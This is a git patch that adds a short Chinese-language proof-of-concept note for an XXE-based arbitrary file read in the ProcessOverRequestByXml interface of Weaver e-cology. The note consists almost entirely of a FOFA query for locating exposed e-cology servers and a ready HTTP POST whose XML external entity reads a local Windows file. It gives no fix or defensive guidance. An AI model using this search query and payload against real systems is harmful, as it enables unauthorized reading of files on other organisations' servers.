From cafa904594ec8884463601aa62d2329d1b16ffae Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 12 Apr 2024 08:50:25 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B3=9B=E5=BE=AEe-cology-ProcessOver?=
 =?UTF-8?q?RequestByXml=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8=E4=BB=BB?=
 =?UTF-8?q?=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...sOverRequestByXml接口存在任意文件读取漏洞.md | 21 +++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞.md

diff --git a/泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞.md b/泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞.md
new file mode 100644
index 0000000..d9448a6
--- /dev/null
+++ b/泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞.md
@@ -0,0 +1,21 @@
+## 泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞
+
+
+## fofa
+```
+body="/js/ecology8" || body="wui/common/css/w7OVFont_wev8.css" || (body="weaver" && body="ecology") || (header="ecology_JSessionId" && body="login/Login.jsp") || body="/wui/index.html" || body="jquery_wev8" && body="/login/Login.jsp?logintype=1"
+```
+
+## poc
+```
+POST /rest/ofs/ProcessOverRequestByXml HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Host: 127.0.0.1
+Content-Type: application/xml
+Content-Length: 146
+
+<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE test[<!ENTITY test SYSTEM "file:///c:/windows/win.ini">]><reset><syscode>&test;</syscode></reset>
+```